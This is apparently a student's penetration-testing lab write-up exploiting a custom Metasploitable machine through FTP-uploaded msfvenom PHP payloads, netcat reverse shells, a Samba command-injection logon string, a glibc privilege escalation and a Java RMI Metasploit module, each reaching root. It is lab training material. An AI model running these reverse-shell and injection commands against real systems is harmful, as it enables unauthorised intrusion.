๐พMetasploitable (Custom 1)
This is a custom vulnerable machine for a penetration testing module. I had to use the provided leaked information to perform tasks and gain root privileges within a given set of time.
This documentation consists of both failed and succeeded attempts to exploit the vulnerable custom machine. There is a table of contents on the right when this page is viewed on the desktop browser. However, it is not available on a mobile device.
The following expandable Contents Menu, which consists of successful exploitations, is to assist viewing of the page on a mobile device.
Contents
Recon: N.A
Reconnaissance was not needed as I was provided with the following leaked credentials:
Username: xxxx
Password: xxxx
Scanning: Nmap
The target IP address was 192.168.249.147
-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-vvvv: Increase verbosity level (use -vv or more for greater effect)
-oA: Output in the three major formats at once
๐ค๐ญ Nmap took 135.55 seconds (about 2.25 mins) which wasn't too long at all for the flags used to find the following information
๐ Enumeration: "Failed" FTP (NSE)
For Enumeration, I will use Nmap Scripting Engine (NSE) to search for any potential information for the following FTP services
nmap -sV -p 2121 192.168.249.147 --script=ftp-proftpd-backdoor
nmap -sV -p 21 192.168.249.147 --script=ftp-vsftpd-backdoor
nmap -sV -p 21 192.168.249.147 --script=ftp-brute
nmap -sV -p 2121 192.168.249.147 --script=ftp-brute
๐ค๐ญ I wasn't able to find any additional information using NSE
๐ Exploitation: "Failed" FTP (Msfconsole)
Using the information from the Nmap scan results, I can attempt to access the 2 FTP ports
๐ค๐ญ There is a hint that port 21 vsftpd is not working. However I will still try using Msfconsole just to make sure
Execute msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
options
set rhosts 192.168.249.147 <target IP>
run
๐ค๐ญ True enough, no session was created. I will try port 2121 ProFTPD and see how it goes
search proftp
๐ค๐ญ However the results were not ideal as there isn't a ProFTPD with version 1.3.1
๐ Exploitation: "It Worked" FTP (Login) / Apache
The following leaked information was provided for this exercise:
Username: xxxx
Password: xxxx
We have the following 2 FTP ports to explore with
I will try to connect to the default FTP port 21 first
ftp 192.168.249.147
๐ค๐ญ It returned with the following errors:
Next, I will try to connect to FTP port 2121
ftp 192.168.249.147 2121
Let me check where is the remote directory that I managed to log into
pwd
I will execute 'ls' to check what are the available files and directories
ls
๐ค๐ญ There s an 'index.html' and earlier I noticed that port 80 is running the Apache service
I can download the index.html file using the ftp's 'get' command to check if the content is the same as when I access the target IP address using 'curl' command or the internet browser
get index.htm
After downloading the index.html file, I will be able to execute the 'cat' command to see its contents
cat index.html
Next, I will execute the 'curl' command to transfer data from the target IP URL for comparison
curl 192.168.249.147
๐ค๐ญ Both the results are identical!
๐ค๐ญ The default directory for Apache service should be /var/www/html. However for this machine, it was configured to the /home/xxxx directory instead as what we had discovered earlier.
Reference: https://httpd.apache.org/docs/trunk/getting-started.html#content
๐ Exploitation: "It Worked" FTP / Apache (Msfvenom Payload)
First I will check what php payloads are available from Msfvenom
msfvenom -l payloads | grep php
I will take a look at the options for the 'php/meterpreter_reverse_tcp' payload
msfvenom -p php/meterpreter_reverse_tcp --list-options
I will proceed to create a payload named 'payload.php' with Msfvenom
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.249.140 lport=5566 -f raw -o payload.php
Next, I will connect to the target using FTP and upload the 'payload.php' file using the 'put' command
put payload.php
Execute 'ls' to confirm that the payload has been uploaded successfully
ls
๐ Exploitation: "Failed" Listener (Msfconsole)
I will fire up Msfconsole to create a listener
msfconsole
use exploit/multi/handler
I will need to set the correct payload as to what I have set in Msfvenom
set payload /php/meterpreter_reverse_tcp
set lhost 192.168.249.140
set lport 5566
options
run
To execute the payload, I simply visit the URL 192.168.249.147/payload.php as shown in Figure 2 or execute 'curl 192.168.249.147/payload.php'
I will proceed to examine the Meterpreter session that I managed to gain
getuid
sysinfo
๐ค๐ญ 'www-data' user is with low privilege and I will need to escalate the privilege
I will try using Msfconsole suggester to see what if there are any potential exploits available
Firstly I will send the Meterpreter session to the background
background
search suggester
I will use the 'suggester' and set it to the Meterpreter session which is 'session 1'
use post/multi/recon/local_exploit_suggester
set session 1
options
run
๐ค๐ญ No suggestions were available and the Meterpreter session closed. It seemed that the session was not a stable one
๐ Note: If by any chance that the output error is 'segmentation fault', it could be due to the usage of a staged payload 'linux/x86/shell/everse_tcp' instead of a stageless payload 'linux/x86/shell_reverse_tcp'
Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212
๐ Exploitation: "Succeeded" FTP / Apache (Msfvenom Payload)
I will use the 'php/exec' payload with Msfvenom next
msfvenom -p php/exec cmd='nc 192.168.249.140 7777 -e /bin/sh' lhost=192.168.249.140 lport=7777 -f raw -o phpexec.php
I will upload the 'phpexec.php' payload via FTP port 2121 using the leaked credentials from earlier
ftp 192.168.249.147 2121
put phpexec.php
๐ Exploitation: "Succeeded" Listener (Msfconsole)
Start msfconsole, use the exploit, set the payload and execute run. The process is the same as from the earlier example
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 192.168.249.140
set lport 7777
options
run
After the reverse TCP handler has started, I will visit the URL of the 'phpexec.php' to trigger the payload as shown in Figure 3 or execute 'curl 192.168.249.147/phpexec.php'
I managed to gain a command shell session. The 'whoami' command was executed to check the name of the user
whoami
๐ค๐ญ I will need to escalate privilege as the current user is 'www-data'
I sent the command shell session to the background and search and use the 'suggester'
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
options
run
I will use 'exploit/linux/local/glibc_ld_audit_dso_load_priv_esc' from the list and set the payload to use
use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.249.140
set lport 7777
set session 1
options
run
getuid
sysinfo
๐ Finally managed to gain the user 'root'!
๐ Enumeration: "It Worked" Samba (SMBmap)
I will use SMBmap to scan the target's port that is running Samba service to find potential information
smbmap -H 192.168.249.147 -P 139
๐ค๐ญ smbmap showed that there is a 'tmp' directory with 'Read, Wrtie' permissions
๐ Exploitation: "Succeeded" Samba (NC / SMBClient)
Using smbclient to check for anonymous login access
smbclient -L 192.168.249.147
Press 'Enter' when it prompted for a password
Start a listener
nc -nlvp 5566
Open another terminal window and access the target's 'tmp' directory
smbclient //192.168.249.147/tmp
Figure 4 above shows 2 opened terminals:
Left terminal: listener
Right terminal: smbclient
Execute the following 'logon' command to make a reverse shell connection
logon "/=`
nc 192.168.249.140 5566 -e /bin/bash`"Press 'Enter' when it prompted for a password
The netcat terminal will receive a connection with a shell session
whoami
๐ It returned with a shell session and upon executing 'whoami', 'root' user was displayed
๐ Exploitation: "Succeeded" Samba (Msfconsole)
search Samba 3.0.20
๐ค๐ญ The above result did not mention the exact Samba 3.0.20 version. However, I will give it a try since it was ranked 'excellent'
options
set lport 5566 (I will usually not use the default 4444)
set lhost 192.168.249.140 <locahost IP>
set rhosts 192.168.249.147 <target IP>
run
whoami
๐ It returned with a shell session and upon executing 'whoami', 'root' user was displayed
Executing the following code will display a 'prettier 'shell session
python -c 'import pty:pty.spawn("bin/bash")'
๐ข Exploitation: "Blunder" Java RMI (Msfconsole)
I had restarted the target machine however I was still using the previous nmap scan to try and exploit port 50981 running the Java-RMI service
set rport 50981 ๐ข
๐ค๐ญ I kept getting the following error no matter how I change the parameters in the options and I was totally clueless what went wrong. It was perfectly fine the other day when I managed to exploit it.
๐ Exploitation: "Succeeded" Java RMI (Msfconsole)
๐ค๐ญ After a good 20-30 mins of going round in circle, I decided to give it a last shot by performing another Nmap scan
nmap -sV -p- --open 192.168.249.147
๐ค๐ญ Mystery solved: the port has changed to 56886 instead
Hence I started Msfconsole, search for the exploit and run it
msfconsole
search type:exploit java rmi
use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.147
set rport 56886 โบ๏ธ
set lhost 192.168.249.140
set lport 5566
options
run
๐ค๐ญ I am getting the following errors:
๐ค๐ญ However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one
sessions
sessions 1
getuid
sysinfo
๐ Executing 'getuid' reflected that the Sever username is 'root'!
Last updated